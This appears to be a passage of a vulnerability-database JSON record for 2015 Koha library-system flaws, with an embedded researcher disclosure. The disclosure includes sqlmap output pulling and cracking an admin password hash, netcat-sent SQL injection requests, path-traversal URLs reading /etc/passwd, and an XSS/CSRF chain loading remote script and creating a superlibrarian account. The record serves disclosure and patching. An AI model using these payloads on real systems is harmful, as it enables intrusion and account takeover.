\u00a0[09:20:52] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors\u00a0\n\u00a0 \u00a0admin\n\u00a0 \u00a0[09:21:46] [INFO] retrieved: $2a$08$taQ\n\u00a0 \u00a0[09:23:33] [ERROR] invalid character detected. retrying.. \n\u00a0 \u00a0[09:23:33] [WARNING] increasing time delay to 5 seconds\u00a0\n\u00a0 \u00a0afOgEEhU\n\u00a0 \u00a0[09:25:10] [ERROR] invalid character detected. retrying.. \n\u00a0 \u00a0[09:25:10] [WARNING] increasing time delay to 6 seconds\u00a0\n\u00a0 \u00a0t/gW\n\u00a0 \u00a0[09:26:13] [ERROR] invalid character detected. retrying.. \n\u00a0 \u00a0[09:26:13] [WARNING] increasing time delay to 7 seconds\u00a0\n\u00a0 \u00a0TOmqnYe1Y6ZNxCENa\n\u00a0 \u00a0[09:29:57] [ERROR] invalid character detected. retrying.. \n\u00a0 \u00a0[09:29:57] [WARNING] increasing time delay to 8 seconds\u00a0\n\u00a0 \u00a02.ONk2eZhnuEw5z9OjjxS\n\u00a0 \u00a0[09:35:08] [ERROR] invalid character detected. retrying.. \n\u00a0 \u00a0[09:35:08] [WARNING] increasing time delay to 9 seconds\u00a0\n\n\u00a0 \u00a0select userid, password from borrowers where flags=1 and password is not null order by borrowernumber desc limit 1;: \u00a0 \u00a0\n\u00a0 \u00a0\u0027admin, $2a$08$taQafOgEEhUt/gWTOmqnYe1Y6ZNxCENa2.ONk2eZhnuEw5z9OjjxS\u0027\n\n3. Feed john the ripper and be lucky\n\n\u00a0 \u00a0root@kali:/home/wicked# echo \"$2a$08$taQafOgEEhUt/gWTOmqnYe1Y6ZNxCENa2.ONk2eZhnuEw5z9OjjxS\" \u003e ./admin-pass\n\u00a0 \u00a0root@kali:/home/wicked# john ./admin-pass\u00a0\n\u00a0 \u00a0Loaded 1 password hash (OpenBSD Blowfish [32/64 X2])\n\u00a0 \u00a0admin \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0(?)\n\u00a0 \u00a0guesses: 1 \u00a0time: 0:00:00:10 DONE (Thu Jun 25 09:45:41 2015) \u00a0c/s: 260 \u00a0trying: Smokey - allstate\n\u00a0 \u00a0Use the \"--show\" option to display all of the cracked passwords reliably\n\n\u00a0 \u00a0root@kali:/home/wicked# john ./admin-pass --show\n\u00a0 \u00a0?:admin\n\n\u00a0 \u00a01 password hash cracked, 0 left\n\n4. If the webserver is misconfigured, read \u0026 write access to the filesystem may be possible. \n\nReferences:\n-----------\nhttp://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14426\n\n# ################################################################################################## #\n# PoC: \t\t\t\t\t\t\t\t\t\t\t\t \u00a0 \u00a0 #\n# ################################################################################################## #\n\n====================================================================\n1. \"Criteria\" Parameter, Payload: ELT(1=1,\u0027evil\u0027) / ELT(1=2,\u0027evil\u0027)\n====================================================================\n\necho -ne \"POST /cgi-bin/koha/reports/borrowers_out.pl HTTP/1.1\\r\\nHost: testbox:9002\\r\\nContent-Length: 186\\r\\n\\r\\nFilter=P_COM\u0026Filter=\u0026Limit=\u0026output=file\u0026basename=Export\u0026MIME=CSV\u0026sep=%3B\u0026report_name=\u0026do_it=1\u0026userid=\u003cusername\u003e\u0026password=\u003cpassword\u003e\u0026branch=\u0026koha_login_context=intranet\u0026Criteria=ELT(1=2,\u0027evil\u0027)\" | nc testbox 9002\n\n\necho -ne \"POST /cgi-bin/koha/reports/borrowers_out.pl HTTP/1.1\\r\\nHost: testbox:9002\\r\\nContent-Length: 186\\r\\n\\r\\nFilter=P_COM\u0026Filter=\u0026Limit=\u0026output=file\u0026basename=Export\u0026MIME=CSV\u0026sep=%3B\u0026report_name=\u0026do_it=1\u0026userid=\u003cusername\u003e\u0026password=\u003cpassword\u003e\u0026branch=\u0026koha_login_context=intranet\u0026Criteria=ELT(1=1,\u0027evil\u0027)\" | nc testbox 9002\n\n====================================================================\n2. \"Filter\" Parameter, Payload: P_COM\u0027+AND+\u0027a\u0027=\u0027a / P_COM\u0027+AND+\u0027a\u0027=\u0027b\n====================================================================\n\necho -ne \"POST /cgi-bin/koha/reports/borrowers_out.pl HTTP/1.1\\r\\nHost: testbox:9002\\r\\nContent-Length: 183\\r\\n\\r\\nkoha_login_context=intranet\u0026Limit=\u0026Criteria=branchcode\u0026output=file\u0026basename=Export\u0026MIME=CSV\u0026sep=;\u0026report_name=\u0026do_it=1\u0026userid=\u003cuserid\u003e\u0026password=\u003cpassword\u003e\u0026branch=\u0026Filter=P_COM\u0027+AND+\u0027a\u0027=\u0027a\" | nc testbox 9002\n\necho -ne \"POST /cgi-bin/koha/reports/borrowers_out.pl HTTP/1.1\\r\\nHost: testbox:9002\\r\\nContent-Length: 183\\r\\n\\r\\nkoha_login_context=intranet\u0026Limit=\u0026Criteria=branchcode\u0026output=file\u0026basename=Export\u0026MIME=CSV\u0026sep=;\u0026report_name=\u0026do_it=1\u0026userid=\u003cuserid\u003e\u0026password=\u003cpassword\u003e\u0026branch=\u0026Filter=P_COM\u0027+AND+\u0027a\u0027=\u0027b\" | nc testbox 9002\n\n====================================================================\n\nYou will notice different output in every second request, demonstrating the evaluation of the payload. \n\n# ################################################################################################## #\n# PoC End\t\t\t\t\t\t\t\t\t\t\t \u00a0 \u00a0 #\n# ################################################################################################## #\n\n=================================\n3. Path Traversal (CVE-2015-4633)\n=================================\n\nVulnerability\n-------------\nThe \"template_path\" parmeter in /cgi-bin/koha/svc/members/search and /cgi-bin/koha/svc/members/search is vulnerable to Path Traversal. \n\nReferences\n----------\nhttp://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14408\n\n\n# ################################################################################################## #\n# PoC: \t\t\t\t\t\t\t\t\t\t\t\t \u00a0 \u00a0 #\n# ################################################################################################## #\n\nThe following input is used to print out /etc/passwd:\n\n/cgi-bin/koha/svc/virtualshelves/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd\n/cgi-bin/koha/svc/members/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd\n\n# ################################################################################################## #\n# PoC End\t\t\t\t\t\t\t\t\t\t\t \u00a0 \u00a0 #\n# ################################################################################################## #\n\n=================================\n4. The site also lacks in the implementation of challenge tokens that prevent cross-site\u00a0\nforgery (XSRF) attacks. \u00a0\n\nThe attack can be performed by:\n\n- through a compromised user account. \u00a0\n\nReferences\n----------------\nhttp://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14416\nhttp://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14423\nhttp://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14418\n\n# ################################################################################################## #\n# PoC / Attack Scenario: \t\t\t\t\t\t\t\t\t \u00a0 \u00a0 #\n# ################################################################################################## #\n\nAlice, a student with restricted permissions on the system, receives a phishing mail (or reads in some forum) and clicks the following link:\n\n--\u003e http://\u003copac-interface\u003e/cgi-bin/koha/opac-shelves.pl?shelves=1\u0026addshelf=Malicious+Input+\u003cscript+src=\u0027http://cst.sba-research.org/x.js\u0027/\u003e\u0026sortfield=title\u0026category=2\u0026allow_add=0\u0026allow_delete_own=1\u0026allow_delete_other=0\n\nBob, library admin, recognizes the new malicious list entry. He logs into the staff area and browses the public lists in order to delete the entry. Once he opens\u00a0\n\n--\u003e http://\u003cstaff-interface\u003e/cgi-bin/koha/virtualshelves/shelves.pl\n\nthe malcious code get\u0027s executed. The code can then perform any unauthorized actions with the pemissions of user bob. For example:\n\nCreate new user:\n-----------------------\n\n--\u003e http://testbox:9002/cgi-bin/koha/members/memberentry.pl?nodouble=\u0026destination=\u0026check_member=\u0026borrowernumber=\u0026nodouble=\u0026title=\u0026firstname=\u0026othernames=\u0026sex=\u0026streetnumber=\u0026streettype=\u0026address2=\u0026city=\u0026state=\u0026zipcode=\u0026country=\u0026phone=\u0026phonepro=\u0026mobile=\u0026email=\u0026emailpro=\u0026fax=\u0026B_address=\u0026B_address2=\u0026B_city=\u0026B_state=\u0026B_zipcode=\u0026B_country=\u0026B_phone=\u0026B_email=\u0026contactnote=\u0026altcontactsurname=\u0026altcontactfirstname=\u0026altcontactaddress1=\u0026altcontactaddress2=\u0026altcontactaddress3=\u0026altcontactstate=\u0026altcontactzipcode=\u0026altcontactcountry=\u0026altcontactphone=\u0026sort1=\u0026sort2=\u0026dateexpiry=\u0026opacnote=\u0026borrowernotes=\u0026patron_attr_1=\u0026BorrowerMandatoryField=surname%7Cdateofbirth%7Ccardnumber%7Caddress\u0026category_type=A\u0026updtype=I\u0026op=insert\u0026surname=hacker\u0026dateofbirth=10%2F06%2F2000\u0026address=fictional\u0026select_city=%7C%7C%7C\u0026cardnumber=9182734629182364\u0026branchcode=MAURES\u0026categorycode=P_COM\u0026dateenrolled=24%2F06%2F2015\u0026userid=hacker\u0026password=hacker\u0026password2=hacker\u0026patron_attr_1_code=PROFESSION\u0026setting_messaging_prefs=1\u0026modify=yes\u0026borrowernumber=\u0026save=Save\u0026setting_extended_patron_attributes=1\n\nGive the new user superlibririan permission:\n----------------------------------------------------------\n\n--\u003e http://testbox:9002/testbox:9002/cgi-bin/koha/members/member-flags.pl?member=7855\u0026newflags=1\u0026flag=superlibrarian\n\nThe attacker can now log as superlibrarian. \n\nSide Note: In order to make the attack work, alice needs to be logged in to the Open Public Catalog interface at the time of when clicking the malicious link. \nAlice needs to have access to the OPAC interface and to have permissions to create public lists. \n\n# ################################################################################################## #\n# PoC / Attack Scenario End\t\t\t\t\t\t\t\t\t \u00a0 \u00a0 #\n# ################################################################################################## #\n\n\n\n\n\n\n\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2015-4631"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-008219"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05198"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05201"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05199"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05200"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05197"
      },
      {
        "db": "BID",
        "id": "75426"
      },
      {
        "db": "IVD",
        "id": "70a561b4-1e6e-11e6-abef-000c29c66e3d"
      },
      {
        "db": "IVD",
        "id": "72631f14-1e6e-11e6-abef-000c29c66e3d"
      },
      {
        "db": "IVD",
        "id": "747c9c94-1e6e-11e6-abef-000c29c66e3d"
      },
      {
        "db": "IVD",
        "id": "182e31fa-1e6e-11e6-abef-000c29c66e3d"
      },
      {
        "db": "IVD",
        "id": "1ad25ddc-1e6e-11e6-abef-000c29c66e3d"
      },
      {
        "db": "PACKETSTORM",
        "id": "132458"
      }
    ],
    "trust": 5.58
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "BID",
        "id": "75426",
        "trust": 3.9
      },
      {
        "db": "NVD",
        "id": "CVE-2015-4631",
        "trust": 3.8
      },
      {
        "db": "PACKETSTORM",
        "id": "132458",
        "trust": 1.7
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201512-696",
        "trust": 1.6
      },
      {
        "db": "EXPLOIT-DB",
        "id": "37389",
        "trust": 1.6
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05197",
        "trust": 0.8
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05198",
        "trust": 0.8
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05199",
        "trust": 0.8
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05200",
        "trust": 0.8
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05201",
        "trust": 0.8
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-008219",
        "trust": 0.8
      },
      {
        "db": "IVD",
        "id": "70A561B4-1E6E-11E6-ABEF-000C29C66E3D",
        "trust": 0.2
      },
      {
        "db": "IVD",
        "id": "72631F14-1E6E-11E6-ABEF-000C29C66E3D",
        "trust": 0.2
      },
      {
        "db": "IVD",
        "id": "747C9C94-1E6E-11E6-ABEF-000C29C66E3D",
        "trust": 0.2
      },
      {
        "db": "IVD",
        "id": "182E31FA-1E6E-11E6-ABEF-000C29C66E3D",
        "trust": 0.2
      },
      {
        "db": "IVD",
        "id": "1AD25DDC-1E6E-11E6-ABEF-000C29C66E3D",
        "trust": 0.2
      }
    ],
    "sources": [
      {
        "db": "IVD",
        "id": "70a561b4-1e6e-11e6-abef-000c29c66e3d"
      },
      {
        "db": "IVD",
        "id": "72631f14-1e6e-11e6-abef-000c29c66e3d"
      },
      {
        "db": "IVD",
        "id": "747c9c94-1e6e-11e6-abef-000c29c66e3d"
      },
      {
        "db": "IVD",
        "id": "182e31fa-1e6e-11e6-abef-000c29c66e3d"
      },
      {
        "db": "IVD",
        "id": "1ad25ddc-1e6e-11e6-abef-000c29c66e3d"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05198"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05201"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05199"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05200"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05197"
      },
      {
        "db": "BID",
        "id": "75426"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-008219"
      },
      {
        "db": "PACKETSTORM",
        "id": "132458"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201512-696"
      },
      {
        "db": "NVD",
        "id": "CVE-2015-4631"
      }
    ]
  },
  "id": "VAR-201810-0024",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "IVD",
        "id": "70a561b4-1e6e-11e6-abef-000c29c66e3d"
      },
      {
        "db": "IVD",
        "id": "72631f14-1e6e-11e6-abef-000c29c66e3d"
      },
      {
        "db": "IVD",
        "id": "747c9c94-1e6e-11e6-abef-000c29c66e3d"
      },
      {
        "db": "IVD",
        "id": "182e31fa-1e6e-11e6-abef-000c29c66e3d"
      },
      {
        "db": "IVD",
        "id": "1ad25ddc-1e6e-11e6-abef-000c29c66e3d"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05198"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05201"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05199"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05200"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05197"
      }
    ],
    "trust": 4.5804196
  },
  "iot_taxonomy": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "category": [
          "ICS"
        ],
        "sub_category": null,
        "trust": 4.0
      }
    ],
    "sources": [
      {
        "db": "IVD",
        "id": "70a561b4-1e6e-11e6-abef-000c29c66e3d"
      },
      {
        "db": "IVD",
        "id": "72631f14-1e6e-11e6-abef-000c29c66e3d"
      },
      {
        "db": "IVD",
        "id": "747c9c94-1e6e-11e6-abef-000c29c66e3d"
      },
      {
        "db": "IVD",
        "id": "182e31fa-1e6e-11e6-abef-000c29c66e3d"
      },
      {
        "db": "IVD",
        "id": "1ad25ddc-1e6e-11e6-abef-000c29c66e3d"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05198"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05201"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05199"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05200"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05197"
      }
    ]
  },
  "last_update_date": "2024-11-23T21:52:48.282000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Bug 14416",
        "trust": 0.8,
        "url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14416"
      },
      {
        "title": "Bug 14418",
        "trust": 0.8,
        "url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14418"
      },
      {
        "title": "Bug 14423",
        "trust": 0.8,
        "url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14423"
      },
      {
        "title": "Security Release - Koha 3.20.1",
        "trust": 0.8,
        "url": "https://koha-community.org/security-release-koha-3-20-1/"
      },
      {
        "title": "Koha 3.14.16 released",
        "trust": 0.8,
        "url": "https://koha-community.org/koha-3-14-16-released/"
      },
      {
        "title": "Security Release - Koha 3.16.12",
        "trust": 0.8,
        "url": "https://koha-community.org/security-release-koha-3-16-12/"
      },
      {
        "title": "Security Release - Koha 3.18.8",
        "trust": 0.8,
        "url": "https://koha-community.org/security-release-koha-3-18-8/"
      },
      {
        "title": "Koha directory traversal vulnerability patch",
        "trust": 0.6,
        "url": "https://www.cnvd.org.cn/patchInfo/show/62257"
      },
      {
        "title": "Patch for Koha cross-site request forgery vulnerability",
        "trust": 0.6,
        "url": "https://www.cnvd.org.cn/patchInfo/show/62260"
      },
      {
        "title": "Koha HTML Injection Vulnerability Patch",
        "trust": 0.6,
        "url": "https://www.cnvd.org.cn/patchInfo/show/62258"
      },
      {
        "title": "Patch for Koha Cross-Site Scripting Vulnerability",
        "trust": 0.6,
        "url": "https://www.cnvd.org.cn/patchInfo/show/62259"
      },
      {
        "title": "Patch for Koha SQL Injection Vulnerability",
        "trust": 0.6,
        "url": "https://www.cnvd.org.cn/patchInfo/show/62255"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2015-05198"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05201"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05199"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05200"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05197"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-008219"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-79",
        "trust": 1.8
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-008219"
      },
      {
        "db": "NVD",
        "id": "CVE-2015-4631"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 3.6,
        "url": "http://www.securityfocus.com/bid/75426"
      },
      {
        "trust": 2.0,
        "url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14418"
      },
      {
        "trust": 2.0,
        "url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14423"
      },
      {
        "trust": 2.0,
        "url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14416"
      },
      {
        "trust": 1.7,
        "url": "https://koha-community.org/security-release-koha-3-16-12/"
      },
      {
        "trust": 1.7,
        "url": "https://koha-community.org/security-release-koha-3-18-8/"
      },
      {
        "trust": 1.7,
        "url": "https://koha-community.org/security-release-koha-3-20-1/"
      },
      {
        "trust": 1.6,
        "url": "https://koha-community.org/koha-3-14-16-released/"
      },
      {
        "trust": 1.6,
        "url": "https://packetstormsecurity.com/files/132458/koha-ils-3.20.x-csrf-xss-traversal-sql-injection.html"
      },
      {
        "trust": 1.6,
        "url": "https://seclists.org/fulldisclosure/2015/jun/80"
      },
      {
        "trust": 1.6,
        "url": "https://www.exploit-db.com/exploits/37389/"
      },
      {
        "trust": 1.6,
        "url": "https://www.sba-research.org/2015/06/24/researchers-of-sba-research-found-several-critical-security-vulnerabilities-in-the-koha-library-software-via-combinatorial-testing/"
      },
      {
        "trust": 0.9,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-4631"
      },
      {
        "trust": 0.8,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-4631"
      },
      {
        "trust": 0.4,
        "url": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14426"
      },
      {
        "trust": 0.4,
        "url": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14408"
      },
      {
        "trust": 0.4,
        "url": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14412"
      },
      {
        "trust": 0.3,
        "url": "http://koha-community.org/"
      },
      {
        "trust": 0.1,
        "url": "http://testbox:9001/cgi-bin/koha/opac-tags_subject.pl?number=10"
      },
      {
        "trust": 0.1,
        "url": "http://testbox:9002/cgi-bin/koha/members/memberentry.pl?nodouble=\u0026destination=\u0026check_member=\u0026borrowernumber=\u0026nodouble=\u0026title=\u0026firstname=\u0026othernames=\u0026sex=\u0026streetnumber=\u0026streettype=\u0026address2=\u0026city=\u0026state=\u0026zipcode=\u0026country=\u0026phone=\u0026phonepro=\u0026mobile=\u0026email=\u0026emailpro=\u0026fax=\u0026b_address=\u0026b_address2=\u0026b_city=\u0026b_state=\u0026b_zipcode=\u0026b_country=\u0026b_phone=\u0026b_email=\u0026contactnote=\u0026altcontactsurname=\u0026altcontactfirstname=\u0026altcontactaddress1=\u0026altcontactaddress2=\u0026altcontactaddress3=\u0026altcontactstate=\u0026altcontactzipcode=\u0026altcontactcountry=\u0026altcontactphone=\u0026sort1=\u0026sort2=\u0026dateexpiry=\u0026opacnote=\u0026borrowernotes=\u0026patron_attr_1=\u0026borrowermandatoryfield=surname%7cdateofbirth%7ccardnumber%7caddress\u0026category_type=a\u0026updtype=i\u0026op=insert\u0026surname=hacker\u0026dateofbirth=10%2f06%2f2000\u0026address=fictional\u0026select_city=%7c%7c%7c\u0026cardnumber=9182734629182364\u0026branchcode=maures\u0026categorycode=p_com\u0026dateenrolled=24%2f06%2f2015\u0026userid=hacker\u0026password=hacker\u0026password2=hacker\u0026patron_attr_1_code=profession\u0026setting_messaging_prefs=1\u0026modify=yes\u0026borrowernumber=\u0026save=save\u0026setting_extended_patron_attributes=1"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-4632"
      },
      {
        "trust": 0.1,
        "url": "http://testbox:9002/testbox:9002/cgi-bin/koha/members/member-flags.pl?member=7855\u0026newflags=1\u0026flag=superlibrarian"
      },
      {
        "trust": 0.1,
        "url": "http://wiki.koha-community.org/wiki/sql_reports_library#superlibrarians"
      },
      {
        "trust": 0.1,
        "url": "http://www.koha-community.org/"
      },
      {
        "trust": 0.1,
        "url": "http://\u003cstaff-interface\u003e/cgi-bin/koha/virtualshelves/shelves.pl"
      },
      {
        "trust": 0.1,
        "url": "http://\u003copac-interface\u003e/cgi-bin/koha/opac-shelves.pl?shelves=1\u0026addshelf=malicious+input+\u003cscript+src=\u0027http://cst.sba-research.org/x.js\u0027/\u003e\u0026sortfield=title\u0026category=2\u0026allow_add=0\u0026allow_delete_own=1\u0026allow_delete_other=0"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-4633"
      },
      {
        "trust": 0.1,
        "url": "http://sqlmap.org"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2015-05198"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05201"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05199"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05200"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05197"
      },
      {
        "db": "BID",
        "id": "75426"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-008219"
      },
      {
        "db": "PACKETSTORM",
        "id": "132458"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201512-696"
      },
      {
        "db": "NVD",
        "id": "CVE-2015-4631"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "IVD",
        "id": "70a561b4-1e6e-11e6-abef-000c29c66e3d"
      },
      {
        "db": "IVD",
        "id": "72631f14-1e6e-11e6-abef-000c29c66e3d"
      },
      {
        "db": "IVD",
        "id": "747c9c94-1e6e-11e6-abef-000c29c66e3d"
      },
      {
        "db": "IVD",
        "id": "182e31fa-1e6e-11e6-abef-000c29c66e3d"
      },
      {
        "db": "IVD",
        "id": "1ad25ddc-1e6e-11e6-abef-000c29c66e3d"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05198"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05201"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05199"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05200"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05197"
      },
      {
        "db": "BID",
        "id": "75426"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-008219"
      },
      {
        "db": "PACKETSTORM",
        "id": "132458"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201512-696"
      },
      {
        "db": "NVD",
        "id": "CVE-2015-4631"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2015-08-12T00:00:00",
        "db": "IVD",
        "id": "70a561b4-1e6e-11e6-abef-000c29c66e3d"
      },
      {
        "date": "2015-08-12T00:00:00",
        "db": "IVD",
        "id": "72631f14-1e6e-11e6-abef-000c29c66e3d"
      },
      {
        "date": "2015-08-12T00:00:00",
        "db": "IVD",
        "id": "747c9c94-1e6e-11e6-abef-000c29c66e3d"
      },
      {
        "date": "2015-08-12T00:00:00",
        "db": "IVD",
        "id": "182e31fa-1e6e-11e6-abef-000c29c66e3d"
      },
      {
        "date": "2015-08-12T00:00:00",
        "db": "IVD",
        "id": "1ad25ddc-1e6e-11e6-abef-000c29c66e3d"
      },
      {
        "date": "2015-08-12T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2015-05198"
      },
      {
        "date": "2015-08-12T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2015-05201"
      },
      {
        "date": "2015-08-12T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2015-05199"
      },
      {
        "date": "2015-08-12T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2015-05200"
      },
      {
        "date": "2015-08-12T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2015-05197"
      },
      {
        "date": "2015-06-25T00:00:00",
        "db": "BID",
        "id": "75426"
      },
      {
        "date": "2019-01-09T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2015-008219"
      },
      {
        "date": "2015-06-26T23:02:22",
        "db": "PACKETSTORM",
        "id": "132458"
      },
      {
        "date": "2015-06-25T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201512-696"
      },
      {
        "date": "2018-10-18T21:29:00.723000",
        "db": "NVD",
        "id": "CVE-2015-4631"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2015-08-12T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2015-05198"
      },
      {
        "date": "2015-08-12T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2015-05201"
      },
      {
        "date": "2015-08-12T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2015-05199"
      },
      {
        "date": "2015-08-12T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2015-05200"
      },
      {
        "date": "2015-08-12T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2015-05197"
      },
      {
        "date": "2015-06-25T00:00:00",
        "db": "BID",
        "id": "75426"
      },
      {
        "date": "2019-01-09T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2015-008219"
      },
      {
        "date": "2018-11-27T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201512-696"
      },
      {
        "date": "2024-11-21T02:31:26.413000",
        "db": "NVD",
        "id": "CVE-2015-4631"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "132458"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201512-696"
      }
    ],
    "trust": 0.7
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Koha Cross-Site Scripting Vulnerability",
    "sources": [
      {
        "db": "IVD",
        "id": "182e31fa-1e6e-11e6-abef-000c29c66e3d"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05200"
      },
